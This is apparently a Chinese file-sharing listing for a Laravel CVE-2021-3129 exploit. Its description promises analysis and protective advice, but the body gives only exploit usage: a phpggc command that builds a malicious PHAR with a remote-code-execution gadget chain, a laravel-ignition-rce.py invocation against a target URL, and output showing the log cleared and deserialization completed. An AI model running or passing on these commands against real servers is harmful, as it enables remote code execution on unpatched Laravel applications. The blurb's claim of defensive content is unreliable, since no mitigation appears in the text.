
Laravel Exploits: CVE-2021-3129 漏洞利用分析
5星
- 浏览量: 0
- 大小:None
- 文件类型:None
简介:
本文章详细解析了CVE-2021-3129漏洞在Laravel框架中的潜在威胁与影响,深入探讨其技术细节,并提供有效的防护措施和安全建议。
Laravel漏洞利用CVE-2021-3129的详细信息如下:
使用方法:
```
$ php -d phar.readonly=0 ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
$
./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar
```
日志文件:`/work/pentest/laravel/laravel/storage/logs/laravel.log`
清除日志信息
成功转换为PHAR!
Phar反序列化完成
全部评论 (0)
还没有任何评论哟~


